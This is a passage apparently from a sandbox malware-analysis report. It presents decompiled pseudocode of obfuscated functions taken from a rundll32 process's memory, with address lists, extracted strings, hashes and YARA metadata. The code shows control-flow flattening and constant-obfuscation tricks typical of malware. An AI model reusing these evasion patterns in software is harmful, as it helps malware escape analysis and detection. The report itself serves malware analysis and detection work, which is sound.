							_t274 = 0xabf6969;
							while(1) {
								_t251 =  *((intOrPtr*)(_t319 + 0x48));
								goto L2;
							}
						}
						if(_t274 == 0x6178099) {
							_t274 = 0x2e2e6a11;
							continue;
						}
						if(_t274 == 0xa9c22c2) {
							if( *((intOrPtr*)(_t272 + 4)) < 0x74) {
								L30:
								return _t307;
							}
							_t274 = 0x6178099;
							continue;
						}
						if(_t274 == 0xabf6969) {
							if(_t307 == 0) {
								E0043DE81( *(_t319 + 0x6c),  *_t308,  *((intOrPtr*)(_t319 + 0x64)));
							}
							goto L30;
						}
						if(_t274 == 0xfdd9a18) {
							_push(_t274);
							_t266 =  *0x450400; // 0x0
							E004355B6( *((intOrPtr*)(_t319 + 0x74)),  *((intOrPtr*)(_t319 + 0x70)),  *((intOrPtr*)(_t319 + 0x94)),  *((intOrPtr*)(_t319 + 0x8c)),  *((intOrPtr*)(_t266 + 0x18)),  *(_t319 + 0x2c), _t274, _t274,  *(_t319 + 0x5c),  *(_t319 + 0x40),  *(_t319 + 0x14));
							_t319 = _t319 + 0x28;
							_t307 =  !=  ? 1 : _t307;
							_t274 = 0x239299c3;
							while(1) {
								_t251 =  *((intOrPtr*)(_t319 + 0x48));
								goto L2;
							}
						}
						if(_t274 != 0x22b04821) {
							L26:
							if(_t274 == 0x26ae1a3c) {
								goto L30;
							}
							while(1) {
								_t251 =  *((intOrPtr*)(_t319 + 0x48));
								goto L2;
							}
						}
						E00436374( *((intOrPtr*)(_t319 + 0x38)),  *_t308, _t316, _t251,  *(_t319 + 0x4c));
						_t319 = _t319 + 0xc;
						_t274 = 0x33e31eb3;
						while(1) {
							_t251 =  *((intOrPtr*)(_t319 + 0x48));
							goto L2;
						}
					}
					if(_t274 == 0x2c8b1a44) {
						_t252 =  *0x450400; // 0x0
						_t254 = E004372A4( *(_t319 + 0x44), _t319 + 0x70,  *(_t319 + 0x3c),  *((intOrPtr*)(_t319 + 0x50)), _t274,  *((intOrPtr*)(_t319 + 0x64)),  *_t252);
						_t319 = _t319 + 0x18;
						if(_t254 == 0) {
							_t274 = 0xabf6969;
							goto L26;
						}
						_t274 = 0x22b04821;
						while(1) {
							_t251 =  *((intOrPtr*)(_t319 + 0x48));
							goto L2;
						}
					}
					if(_t274 == 0x2e2e6a11) {
						 *((intOrPtr*)(_t308 + 4)) =  *((intOrPtr*)(_t272 + 4)) - 0x74;
						_push(_t274);
						_t260 = E004354FB( *((intOrPtr*)(_t308 + 4)));
						 *_t308 = _t260;
						if(_t260 == 0) {
							goto L30;
						}
						_t261 =  *_t272;
						_t274 = 0x2c8b1a44;
						 *((intOrPtr*)(_t319 + 0x70)) = _t261;
						_t251 = _t261 + 0x74;
						 *((intOrPtr*)(_t319 + 0x48)) = _t261 + 0x74;
						_t316 =  *((intOrPtr*)(_t272 + 4)) - 0x74;
						goto L2;
					}
					if(_t274 == 0x3039966c) {
						_t274 = 0xa9c22c2;
						goto L2;
					}
					if(_t274 != 0x33e31eb3) {
						goto L26;
					}
					_push(_t274);
					_t305 =  *0x450400; // 0x0
					_t276 =  *(_t319 + 0x58);
					E00434648(_t276,  *((intOrPtr*)(_t305 + 0x10)),  *((intOrPtr*)(_t319 + 0x88)), _t308 + 4,  *(_t319 + 0x34),  *(_t319 + 0x4c), _t274,  *((intOrPtr*)(_t319 + 0x64)),  *_t308);
					_t319 = _t319 + 0x20;
					asm("sbb ecx, ecx");
					_t274 = (_t276 & 0xec4b0055) + 0x239299c3;
				}
			}

0x0043f9be
0x0043f9c7
0x0043f9cf
0x0043f9d0
0x0043f9d7
0x0043f9d8
0x0043f9da
0x0043f9df
0x0043f9ea
0x0043f9ed
0x0043f9f5
0x0043f9f7
0x0043f9fd
0x0043fa05
0x0043fa10
0x0043fa15
0x0043fa1b
0x0043fa20
0x0043fa25
0x0043fa2d
0x0043fa35
0x0043fa41
0x0043fa46
0x0043fa4c
0x0043fa51
0x0043fa59
0x0043fa61
0x0043fa65
0x0043fa6d
0x0043fa75
0x0043fa7d
0x0043fa85
0x0043fa8d
0x0043fa95
0x0043fa9a
0x0043faa2
0x0043faaa
0x0043fab2
0x0043fabe
0x0043fac1
0x0043fac5
0x0043facd
0x0043fad5
0x0043fadd
0x0043fae5
0x0043faed
0x0043faf5
0x0043fafd
0x0043fb02
0x0043fb0a
0x0043fb12
0x0043fb17
0x0043fb1f
0x0043fb27
0x0043fb2f
0x0043fb37
0x0043fb3f
0x0043fb4c
0x0043fb50
0x0043fb58
0x0043fb60
0x0043fb68
0x0043fb72
0x0043fb7e
0x0043fb83
0x0043fb89
0x0043fb91
0x0043fb99
0x0043fba1
0x0043fba6
0x0043fbae
0x0043fbb6
0x0043fbbb
0x0043fbc3
0x0043fbcb
0x0043fbd0
0x0043fbd8
0x0043fbe0
0x0043fbe8
0x0043fbf0
0x0043fbf8
0x0043fc04
0x0043fc09
0x0043fc0f
0x0043fc17
0x0043fc1f
0x0043fc27
0x0043fc2f
0x0043fc37
0x0043fc43
0x0043fc48
0x0043fc4e
0x0043fc56
0x0043fc5e
0x0043fc66
0x0043fc73
0x0043fc74
0x0043fc78
0x0043fc80
0x0043fc88
0x0043fc90
0x0043fc9d
0x0043fca7
0x0043fcab
0x0043fcaf
0x0043fcb7
0x0043fcbf
0x0043fcc9
0x0043fccd
0x0043fcd5
0x0043fcdd
0x0043fcdd
0x0043fce1
0x0043fce1
0x0043fce1
0x0043fce7
0x00000000
0x00000000
0x0043fced
0x0043fdbb
0x0043fdc1
0x0043fcdd
0x0043fcdd
0x00000000
0x0043fcdd
0x0043fcdd
0x0043fcf9
0x0043fda5
0x00000000
0x0043fda5
0x0043fd05
0x0043fd95
0x0043fed9
0x0043fee2
0x0043fee2
0x0043fd9b
0x00000000
0x0043fd9b
0x0043fd11
0x0043fec7
0x0043fed3
0x0043fed8
0x00000000
0x0043fec7
0x0043fd1d
0x0043fd46
0x0043fd59
0x0043fd77
0x0043fd7e
0x0043fd84
0x0043fd87
0x0043fcdd
0x0043fcdd
0x00000000
0x0043fcdd
0x0043fcdd
0x0043fd25
0x0043feb8
0x0043febe
0x00000000
0x00000000
0x0043fcdd
0x0043fcdd
0x00000000
0x0043fcdd
0x0043fcdd
0x0043fd37
0x0043fd3c
0x0043fd3f
0x0043fcdd
0x0043fcdd
0x00000000
0x0043fcdd
0x0043fcdd
0x0043fdd1
0x0043fe80
0x0043fe9d
0x0043fea2
0x0043fea7
0x0043feb3
0x00000000
0x0043feb3
0x0043fea9
0x0043fcdd
0x0043fcdd
0x00000000
0x0043fcdd
0x0043fcdd
0x0043fddd
0x0043fe48
0x0043fe56
0x0043fe57
0x0043fe5c
0x0043fe61
0x00000000
0x00000000
0x0043fe63
0x0043fe65
0x0043fe6d
0x0043fe71
0x0043fe74
0x0043fe78
0x00000000
0x0043fe78
0x0043fde5
0x0043fe38
0x00000000
0x0043fe38
0x0043fded
0x00000000
0x00000000
0x0043fdf3
0x0043fe06
0x0043fe0c
0x0043fe1b
0x0043fe20
0x0043fe25
0x0043fe2d
0x0043fe2d

Strings

(x, xrefs: 0043FA75
b, xrefs: 0043FA59
?, xrefs: 0043FAD5
U, xrefs: 0043FBD8
q7, xrefs: 0043FBAE
_M, xrefs: 0043FB50

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: (x$_M$b$q7$?$U
API String ID: 0-3432079992
Opcode ID: 877348c0c8d0f4c4f25ad476fc1e26735a2970c52b246d75571680986e089df6
Instruction ID: 84ed5882480bc55c995c70d0761e4947d32d96df1d091f4a7ddabe477a3a7072
Opcode Fuzzy Hash: 877348c0c8d0f4c4f25ad476fc1e26735a2970c52b246d75571680986e089df6
Instruction Fuzzy Hash: 11D178715083418FD368CF25C98991BBBF1FB88708F10992EF596862A1D3BAD949CF47

Uniqueness

Uniqueness Score: -1.00%

Function 0017EF2E, Relevance: 7.8, Strings: 6, Instructions: 288COMMON

Download Yara Rule

Strings

b, xrefs: 0017EFCD
_M, xrefs: 0017F0C4
?, xrefs: 0017F049
(x, xrefs: 0017EFE9
U, xrefs: 0017F14C
q7, xrefs: 0017F122

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: (x$_M$b$q7$?$U
API String ID: 0-3432079992
Opcode ID: 783565f6daaf8394181f1f84426d1e8f682b391c744a7ddb6f995b441d0267f5
Instruction ID: 7444d970c4f8ea7f75a6bfb4137eaa0c24c1531e1fab33a1cdcb4c5b49f4a55f
Opcode Fuzzy Hash: 783565f6daaf8394181f1f84426d1e8f682b391c744a7ddb6f995b441d0267f5
Instruction Fuzzy Hash: 36D146715083418FD768CF25C88992BBBF1FBC4708F10892DF69A962A1D7B6D949CF42

Uniqueness

Uniqueness Score: -1.00%

Function 00442C05, Relevance: 6.4, Strings: 5, Instructions: 196
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E00442C05() {
				char _v524;
				void* _v536;
				intOrPtr _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				short* _t200;
				void* _t208;
				signed int _t237;
				signed int _t238;
				signed int _t239;
				signed int _t240;
				signed int _t246;
				void* _t248;

				_t248 = (_t246 & 0xfffffff8) - 0x268;
				_v540 = 0x4aeeb3;
				asm("stosd");
				_t208 = 0x168467f0;
				_t237 = 0x77;
				asm("stosd");
				asm("stosd");
				_v568 = 0xd92c;
				_v568 = _v568 >> 3;
				_v568 = _v568 << 4;
				_v568 = _v568 ^ 0x0001ce43;
				_v604 = 0x418b;
				_v604 = _v604 * 0x64;
				_v604 = _v604 + 0xffff391d;
				_v604 = _v604 / _t237;
				_v604 = _v604 ^ 0x00007a4a;
				_v596 = 0xd566;
				_v596 = _v596 | 0xeedd709a;
				_v596 = _v596 ^ 0xf9b8657b;
				_t238 = 0x6f;
				_v596 = _v596 * 0x5e;
				_v596 = _v596 ^ 0x974b04be;
				_v612 = 0x6f9a;
				_v612 = _v612 | 0x3884a709;
				_v612 = _v612 << 0xf;
				_v612 = _v612 << 6;
				_v612 = _v612 ^ 0xf3601087;
				_v580 = 0x8bec;
				_v580 = _v580 >> 9;
				_v580 = _v580 ^ 0x2eaf309c;
				_v580 = _v580 ^ 0x2eaf504a;
				_v560 = 0xa090;
				_v560 = _v560 * 9;
				_v560 = _v560 ^ 0x0005eac7;
				_v544 = 0x385a;
				_v544 = _v544 ^ 0x5ab572c8;
				_v544 = _v544 ^ 0x5ab54f08;
				_v616 = 0x2ce0;
				_v616 = _v616 * 0x53;
				_v616 = _v616 | 0xcc7552e6;
				_v616 = _v616 << 0xa;
				_v616 = _v616 ^ 0xff7bc757;
				_v588 = 0xba69;
				_v588 = _v588 ^ 0x8b3f6b4e;
				_v588 = _v588 | 0x1d9047e7;
				_v588 = _v588 * 0x71;
				_v588 = _v588 ^ 0x83ae1873;
				_v600 = 0x31bb;
				_v600 = _v600 | 0x7d88d622;
				_v600 = _v600 >> 6;
				_v600 = _v600 << 3;
				_v600 = _v600 ^ 0x0fb10440;
				_v608 = 0xa2c7;
				_v608 = _v608 | 0x1a87515d;
				_v608 = _v608 + 0x2205;
				_v608 = _v608 << 0xc;
				_v608 = _v608 ^ 0x815e66bd;
				_v548 = 0x16a6;
				_v548 = _v548 / _t238;
				_v548 = _v548 ^ 0x00007853;
				_v564 = 0xafe9;
				_v564 = _v564 >> 6;
				_v564 = _v564 + 0x5855;
				_v564 = _v564 ^ 0x00006462;
				_v572 = 0x600e;
				_v572 = _v572 >> 0x10;
				_v572 = _v572 + 0xffff4dcd;
				_v572 = _v572 ^ 0xffff74cd;
				_v576 = 0x4506;
				_v576 = _v576 ^ 0x208744c8;
				_t239 = 0x27;
				_v576 = _v576 / _t239;
				_v576 = _v576 ^ 0x00d5f9e3;
				_v552 = 0x4cfb;
				_t240 = 0x5d;
				_v552 = _v552 / _t240;
				_v552 = _v552 ^ 0x00002411;
				_v584 = 0xa1f9;
				_v584 = _v584 * 0x65;
				_v584 = _v584 >> 7;
				_v584 = _v584 + 0xffff7216;
				_v584 = _v584 ^ 0xffffd98b;
				_v556 = 0x4ff1;
				_v556 = _v556 + 0xffffdafb;
				_v556 = _v556 ^ 0x000023fd;
				_v592 = 0xb847;
				_v592 = _v592 ^ 0xa357aca7;
				_v592 = _v592 * 0x3b;
				_v592 = _v592 << 2;
				_v592 = _v592 ^ 0x94472c8e;
				do {
					while(_t208 != 0xdfc3d3e) {
						if(_t208 == 0x107f2098) {
							_t200 = E0043D6F0(E0043FFBA, _v552, _v584, _v556,  &_v524, _v592, 0,  &_v524);
						} else {
							if(_t208 == 0x168467f0) {
								_t208 = 0x2514110a;
								continue;
							} else {
								_t255 = _t208 - 0x2514110a;
								if(_t208 != 0x2514110a) {
									goto L8;
								} else {
									_push(0x4312d8);
									_push(_v612);
									_push(_v596);
									E0043A4D7(_t255, _v560, _v544, _v616, _v588, E00435DFC(_v568, _v604, _t255),  *0x451088 + 0x254,  &_v524,  *0x451088 + 0x38);
									_t200 = E00440D6D(_v600, _v608, _v548, _t202);
									_t248 = _t248 + 0x34;
									_t208 = 0xdfc3d3e;
									continue;
								}
							}
						}
						L11:
						return _t200;
					}
					_t200 = E0043BDCC( &_v524, _v564, _v572, _v576);
					__eflags = 0;
					 *_t200 = 0;
					_t208 = 0x107f2098;
					L8:
					__eflags = _t208 - 0x23e79497;
				} while (__eflags != 0);
				goto L11;
			}

0x00442c0b
0x00442c11
0x00442c25
0x00442c26
0x00442c2d
0x00442c30
0x00442c31
0x00442c32
0x00442c3a
0x00442c3f
0x00442c44
0x00442c4c
0x00442c59
0x00442c5d
0x00442c6d
0x00442c71
0x00442c79
0x00442c81
0x00442c89
0x00442c96
0x00442c97
0x00442c9b
0x00442ca3
0x00442cab
0x00442cb3
0x00442cb8
0x00442cbd
0x00442cc5
0x00442ccd
0x00442cd2
0x00442cda
0x00442ce2
0x00442cef
0x00442cf3
0x00442cfb
0x00442d03
0x00442d0b
0x00442d13
0x00442d20
0x00442d24
0x00442d2c
0x00442d31
0x00442d39
0x00442d41
0x00442d49
0x00442d56
0x00442d5a
0x00442d62
0x00442d6a
0x00442d72
0x00442d77
0x00442d7c
0x00442d84
0x00442d8c
0x00442d94
0x00442d9c
0x00442da1
0x00442da9
0x00442db7
0x00442dbb
0x00442dc3
0x00442dcb
0x00442dd0
0x00442dd8
0x00442de2
0x00442def
0x00442df9
0x00442e06
0x00442e0e
0x00442e16
0x00442e24
0x00442e29
0x00442e2f
0x00442e37
0x00442e43
0x00442e46
0x00442e4a
0x00442e52
0x00442e5f
0x00442e63
0x00442e68
0x00442e70
0x00442e78
0x00442e80
0x00442e88
0x00442e90
0x00442e98
0x00442ea5
0x00442ea9
0x00442eae
0x00442eb6
0x00442eb6
0x00442ec0
0x00442f91
0x00442ec6
0x00442ecc
0x00442f41
0x00000000
0x00442ece
0x00442ece
0x00442ed0
0x00000000
0x00442ed6
0x00442ed6
0x00442edb
0x00442edf
0x00442f20
0x00442f32
0x00442f37
0x00442f3a
0x00000000
0x00442f3a
0x00442ed0
0x00442ecc
0x00442f99
0x00442fa0
0x00442fa0
0x00442f58
0x00442f5f
0x00442f61
0x00442f64
0x00442f66
0x00442f66
0x00442f66
0x00000000

Strings

Sx, xrefs: 00442DBB
bd, xrefs: 00442DD8
Jz, xrefs: 00442C71
,, xrefs: 00442D13
Z8, xrefs: 00442CFB

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: Jz$Sx$Z8$bd$,
API String ID: 0-4260221676
Opcode ID: 68078d2e7bee8833b5807d3ecfd60d3c4283e3152189d32d2692c6d2e2396cfb
Instruction ID: 90840f64dc0118e34c586b0432a0567ff528c251d797752223b37bfb70144f2e
Opcode Fuzzy Hash: 68078d2e7bee8833b5807d3ecfd60d3c4283e3152189d32d2692c6d2e2396cfb
Instruction Fuzzy Hash: 4F913F715083419FD358CF66C98A41FFBF1BB88748F508A1DF296962A0D3B58A49CF87

Uniqueness

Uniqueness Score: -1.00%

Function 00182179, Relevance: 6.4, Strings: 5, Instructions: 196COMMON

Download Yara Rule

Strings

,, xrefs: 00182287
Z8, xrefs: 0018226F
bd, xrefs: 0018234C
Jz, xrefs: 001821E5
Sx, xrefs: 0018232F

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: Jz$Sx$Z8$bd$,
API String ID: 0-4260221676
Opcode ID: 66d0b6c60246877f17bc3dfb7a2af81e84fbea4fa8362f65fd740d4ef723ee12
Instruction ID: abf6290e42849098da9738c8a33db3a5e84eff84739433dbd5ff013eabf310f9
Opcode Fuzzy Hash: 66d0b6c60246877f17bc3dfb7a2af81e84fbea4fa8362f65fd740d4ef723ee12
Instruction Fuzzy Hash: CB911E711083419FD359CF66D88981FFBF1BB89748F508A1DF196962A0D3B58A49CF82

Uniqueness

Uniqueness Score: -1.00%

Function 00437B39, Relevance: 6.4, Strings: 5, Instructions: 185
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E00437B39(void* __ecx, void* __edx, intOrPtr* _a4, signed int* _a8, intOrPtr _a12) {
				char _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				unsigned int _v124;
				signed int _v128;
				void* _t159;
				signed int _t184;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				void* _t195;
				signed int* _t216;
				signed int* _t219;

				_t216 = _a8;
				_push(_a12);
				_t215 = _a4;
				_push(_t216);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00442550(_t159);
				_v84 = 0xb1cc;
				_t219 =  &(( &_v128)[5]);
				_v84 = _v84 << 4;
				_v84 = _v84 ^ 0x000b391c;
				_t195 = 0x56cb2a8;
				_v128 = 0xbdb6;
				_t189 = 0x75;
				_v128 = _v128 * 0x3c;
				_v128 = _v128 + 0xffff325f;
				_v128 = _v128 | 0xdb930895;
				_v128 = _v128 ^ 0xdbbbdb43;
				_v120 = 0x3f39;
				_v120 = _v120 / _t189;
				_v120 = _v120 | 0x67adff47;
				_t190 = 0x54;
				_v120 = _v120 / _t190;
				_v120 = _v120 ^ 0x013b8a2c;
				_v124 = 0x6147;
				_v124 = _v124 + 0xb97c;
				_v124 = _v124 + 0xd90c;
				_v124 = _v124 >> 0xe;
				_v124 = _v124 ^ 0x00007a9c;
				_v112 = 0x89a1;
				_t191 = 0x58;
				_v112 = _v112 / _t191;
				_v112 = _v112 + 0xf8e9;
				_v112 = _v112 >> 3;
				_v112 = _v112 ^ 0x0000539c;
				_v76 = 0x8cc3;
				_v76 = _v76 + 0xac03;
				_v76 = _v76 ^ 0x00011eb4;
				_v116 = 0xfa45;
				_v116 = _v116 + 0xffff9361;
				_v116 = _v116 | 0xe6f660f2;
				_v116 = _v116 >> 1;
				_v116 = _v116 ^ 0x737b7b0a;
				_v104 = 0xcf7e;
				_v104 = _v104 << 0xe;
				_v104 = _v104 * 0x27;
				_v104 = _v104 ^ 0xe70cfdcc;
				_v72 = 0x35c6;
				_v72 = _v72 ^ 0x4611c0ec;
				_v72 = _v72 ^ 0x4611c92f;
				_v100 = 0x6fa4;
				_v100 = _v100 * 0x52;
				_v100 = _v100 | 0xcb75e14d;
				_v100 = _v100 ^ 0xcb77ed32;
				_v68 = 0x95e2;
				_v68 = _v68 + 0x2a27;
				_v68 = _v68 ^ 0x0000e822;
				_v88 = 0xac43;
				_v88 = _v88 * 0x58;
				_v88 = _v88 >> 8;
				_v88 = _v88 ^ 0x00007f70;
				_v92 = 0x7b7b;
				_v92 = _v92 + 0xffffa4a1;
				_v92 = _v92 << 0xd;
				_v92 = _v92 ^ 0x0403a3f8;
				_v96 = 0x9efc;
				_v96 = _v96 ^ 0x9f755fcb;
				_t192 = 0x7a;
				_v96 = _v96 / _t192;
				_v96 = _v96 ^ 0x014e9ac3;
				_v80 = 0x52a1;
				_v80 = _v80 >> 1;
				_v80 = _v80 ^ 0x00002d50;
				_v108 = 0x1e90;
				_v108 = _v108 + 0xffffb99d;
				_v108 = _v108 + 0xd5ca;
				_v108 = _v108 ^ 0x0000a5f7;
				do {
					while(_t195 != 0x56cb2a8) {
						if(_t195 == 0x686a9af) {
							E0043BAD2(_v68, _v88, __eflags, _t215 + 4,  &_v64, _v92);
						} else {
							if(_t195 == 0xd2701c0) {
								E0043F834( *_t215, _v72,  &_v64, _v100);
								_t219 =  &(_t219[2]);
								_t195 = 0x686a9af;
								continue;
							} else {
								if(_t195 == 0x104361af) {
									_t214 =  &_v64;
									E0043FEE3(_t216,  &_v64, _v112, _v76, _v116, _v104);
									_t219 =  &(_t219[4]);
									_t195 = 0xd2701c0;
									continue;
								} else {
									if(_t195 == 0x1c12ad24) {
										_t214 = _t216[1];
										_push(_t195);
										_t184 = E004354FB(_t216[1]);
										 *_t216 = _t184;
										__eflags = _t184;
										if(__eflags != 0) {
											_t195 = 0x104361af;
											continue;
										}
									} else {
										_t227 = _t195 - 0x25d9ecfc;
										if(_t195 != 0x25d9ecfc) {
											goto L13;
										} else {
											_t216[1] = E00433134(_t215);
											_t216[1] = _t216[1] + E0043DF8A(_t215, _t214, _t227, _v108, _v80);
											_t195 = 0x1c12ad24;
											continue;
										}
									}
								}
							}
						}
						L16:
						__eflags =  *_t216;
						_t158 =  *_t216 != 0;
						__eflags = _t158;
						return 0 | _t158;
					}
					_t195 = 0x25d9ecfc;
					 *_t216 =  *_t216 & 0x00000000;
					__eflags =  *_t216;
					_t216[1] = _v96;
					L13:
					__eflags = _t195 - 0xb99db01;
				} while (__eflags != 0);
				goto L16;
			}

0x00437b42
0x00437b4a
0x00437b51
0x00437b58
0x00437b59
0x00437b5a
0x00437b5b
0x00437b5c
0x00437b61
0x00437b69
0x00437b6c
0x00437b73
0x00437b7b
0x00437b80
0x00437b8f
0x00437b92
0x00437b96
0x00437b9e
0x00437ba6
0x00437bae
0x00437bbe
0x00437bc2
0x00437bce
0x00437bd3
0x00437bd9
0x00437be1
0x00437be9
0x00437bf1
0x00437bf9
0x00437bfe
0x00437c06
0x00437c12
0x00437c15
0x00437c19
0x00437c21
0x00437c26
0x00437c2e
0x00437c36
0x00437c3e
0x00437c46
0x00437c4e
0x00437c56
0x00437c5e
0x00437c62
0x00437c6a
0x00437c72
0x00437c7c
0x00437c80
0x00437c88
0x00437c90
0x00437c98
0x00437ca0
0x00437cad
0x00437cb1
0x00437cb9
0x00437cc1
0x00437cc9
0x00437cd1
0x00437cd9
0x00437ce6
0x00437cea
0x00437cef
0x00437cf9
0x00437d06
0x00437d0e
0x00437d13
0x00437d1b
0x00437d23
0x00437d31
0x00437d39
0x00437d3d
0x00437d45
0x00437d4d
0x00437d51
0x00437d59
0x00437d61
0x00437d69
0x00437d71
0x00437d79
0x00437d79
0x00437d8b
0x00437e77
0x00437d91
0x00437d97
0x00437e36
0x00437e3b
0x00437e3e
0x00000000
0x00437d9d
0x00437d9f
0x00437e03
0x00437e15
0x00437e1a
0x00437e1d
0x00000000
0x00437da1
0x00437da7
0x00437de4
0x00437de7
0x00437de8
0x00437ded
0x00437df0
0x00437df2
0x00437df8
0x00000000
0x00437df8
0x00437da9
0x00437da9
0x00437dab
0x00000000
0x00437db1
0x00437db8
0x00437dd0
0x00437dd5
0x00000000
0x00437dd5
0x00437dab
0x00437da7
0x00437d9f
0x00437d97
0x00437e7f
0x00437e81
0x00437e86
0x00437e86
0x00437e90
0x00437e90
0x00437e4c
0x00437e4e
0x00437e4e
0x00437e51
0x00437e54
0x00437e54
0x00437e54
0x00000000

Strings

{{, xrefs: 00437CF9
Ga, xrefs: 00437BE1
", xrefs: 00437CD1
{{s, xrefs: 00437C62
P-, xrefs: 00437D51

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: {{s$"$Ga$P-${{
API String ID: 0-2936447301
Opcode ID: 39ec68ea787343e8064b98ec4664fe2485481eda1314bce75b272653a1e2ae17
Instruction ID: 548864e9f756f9095dc8fac3b9e84d9f4f81ace5cb0675794127cbc785d746b1
Opcode Fuzzy Hash: 39ec68ea787343e8064b98ec4664fe2485481eda1314bce75b272653a1e2ae17
Instruction Fuzzy Hash: C18112B15083429FD368CF21C48981FBBF1AB88358F50991EF19A962A0D779DA498F47

Uniqueness

Uniqueness Score: -1.00%

Function 001770AD, Relevance: 6.4, Strings: 5, Instructions: 185COMMON

Download Yara Rule

Strings

", xrefs: 00177245
P-, xrefs: 001772C5
Ga, xrefs: 00177155
{{s, xrefs: 001771D6
{{, xrefs: 0017726D

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: {{s$"$Ga$P-${{
API String ID: 0-2936447301
Opcode ID: cea13ba85886a609e731189476ad41596344b7230d863bf0c99a5505cd97314b
Instruction ID: 145f8e974f70600d83061cc9d43d864f581bf97830df33c000ed4a180691c1c5
Opcode Fuzzy Hash: cea13ba85886a609e731189476ad41596344b7230d863bf0c99a5505cd97314b
Instruction Fuzzy Hash: 15811FB15083429FD368CF21C48981FBBF1BBC8358F50891DF59A962A0D7B9DA49CF42

Uniqueness

Uniqueness Score: -1.00%

Function 00432DDF, Relevance: 6.4, Strings: 5, Instructions: 184
COMMONCrypto

Download Yara Rule

C-Code - Quality: 72%

			E00432DDF(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v556;
				signed int _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				void* _t153;
				signed int _t171;
				signed int _t174;
				void* _t178;
				signed int _t186;
				void* _t201;
				signed int _t202;
				signed int _t203;
				signed int _t204;
				signed int _t205;
				signed int* _t209;

				_push(_a8);
				_t201 = __edx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00442550(_t153);
				_v560 = _v560 & 0x00000000;
				_t209 =  &(( &_v628)[4]);
				_v568 = 0x24f3a1;
				_v564 = 0x3c9bd4;
				_t178 = 0x32110b52;
				_v576 = 0x263a;
				_v576 = _v576 << 1;
				_v576 = _v576 ^ 0x00007813;
				_v620 = 0x4ee;
				_t202 = 0x33;
				_v620 = _v620 / _t202;
				_v620 = _v620 + 0xffff352c;
				_v620 = _v620 ^ 0xc3d5301d;
				_v620 = _v620 ^ 0x3c2a31a1;
				_v600 = 0x4188;
				_v600 = _v600 + 0xffffb186;
				_v600 = _v600 << 6;
				_v600 = _v600 ^ 0xfffcab3f;
				_v628 = 0xc09d;
				_v628 = _v628 + 0xffff1566;
				_v628 = _v628 | 0xe9e98308;
				_v628 = _v628 << 0xf;
				_v628 = _v628 ^ 0xeb85c3aa;
				_v608 = 0x281d;
				_t203 = 0x58;
				_v608 = _v608 / _t203;
				_v608 = _v608 | 0xeb359492;
				_v608 = _v608 ^ 0xeb35e871;
				_v612 = 0x4fd;
				_t204 = 0x71;
				_v612 = _v612 * 0x31;
				_v612 = _v612 + 0xffff74e9;
				_v612 = _v612 ^ 0x3f703ef4;
				_v612 = _v612 ^ 0x3f704256;
				_v572 = 0x8bdc;
				_v572 = _v572 >> 6;
				_v572 = _v572 ^ 0x00004ce8;
				_v616 = 0xbbb9;
				_v616 = _v616 * 0x57;
				_v616 = _v616 + 0x295;
				_v616 = _v616 ^ 0x9d8bead1;
				_v616 = _v616 ^ 0x9db42d64;
				_v592 = 0xdb3f;
				_v592 = _v592 | 0x5fa632d8;
				_v592 = _v592 ^ 0xb4c5443f;
				_v592 = _v592 ^ 0xeb638af6;
				_v624 = 0xda21;
				_v624 = _v624 / _t204;
				_t205 = 0x79;
				_v624 = _v624 / _t205;
				_v624 = _v624 | 0xd586b067;
